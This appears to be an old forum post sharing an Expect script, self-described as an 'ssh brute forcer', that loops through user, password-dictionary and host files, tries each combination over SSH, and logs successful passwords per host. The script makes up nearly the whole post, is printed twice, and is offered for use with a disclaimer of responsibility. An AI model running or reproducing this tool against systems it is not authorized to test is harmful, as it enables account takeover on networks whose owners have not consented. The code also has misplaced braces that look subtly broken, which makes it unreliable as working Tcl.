admin
06-29-2003, 01:21 AM
This is an expect script that will allow you to specify a host file, user file, and a dictionary. Extremely useful for auditing large networks where you can't manually log into every machine or don't feel like re-running something on every host.
==============================================
#!/usr/bin/expect -f
#
# Written by James Shanahan (jshanahan@comcastpc.com)
# and Erin Palmer(epalmer@comcastpc.com)
# ssh brute forcer
# This will allow you to specify hosts, password lists, and a user
# I do not take any responsibility for what you do with this tool
# Hopefully it will make your life easier rather then making other
# peoples lives more difficult!
set timeout 5
set dictionary [lindex $argv 0]
set file [lindex $argv 1]
set user [lindex $argv 2]
if {[llength $argv] != 3} {
puts stderr "Usage: $argv0 <dictionary-file> <hosts-file> <user-file>\n"
exit }
set tryHost [open $file r]
set tryPass [open $dictionary r]
set tryUser [open $user r]
set passwords [read $tryPass]
set hosts [read $tryHost]
set login [read $tryUser]
foreach username $login
{
foreach passwd $passwords
{
foreach ip $hosts
{
spawn ssh $username@$ip
expect ":"
send "$passwd\n"
set logFile [open $ip.log a]
expect "L"
{
puts $logFile "password for $username@$ip is $passwd\n"
close $logFile
}
set id [exp_pid]
exec kill -INT $id
}
}
}
==============================================
#!/usr/bin/expect -f
#
# Written by James Shanahan (jshanahan@comcastpc.com)
# and Erin Palmer(epalmer@comcastpc.com)
# ssh brute forcer
# This will allow you to specify hosts, password lists, and a user
# I do not take any responsibility for what you do with this tool
# Hopefully it will make your life easier rather then making other
# peoples lives more difficult!
set timeout 5
set dictionary [lindex $argv 0]
set file [lindex $argv 1]
set user [lindex $argv 2]
if {[llength $argv] != 3} {
puts stderr "Usage: $argv0 <dictionary-file> <hosts-file> <user-file>\n"
exit }
set tryHost [open $file r]
set tryPass [open $dictionary r]
set tryUser [open $user r]
set passwords [read $tryPass]
set hosts [read $tryHost]
set login [read $tryUser]
foreach username $login
{
foreach passwd $passwords
{
foreach ip $hosts
{
spawn ssh $username@$ip
expect ":"
send "$passwd\n"
set logFile [open $ip.log a]
expect "L"
{
puts $logFile "password for $username@$ip is $passwd\n"
close $logFile
}
set id [exp_pid]
exec kill -INT $id
}
}
}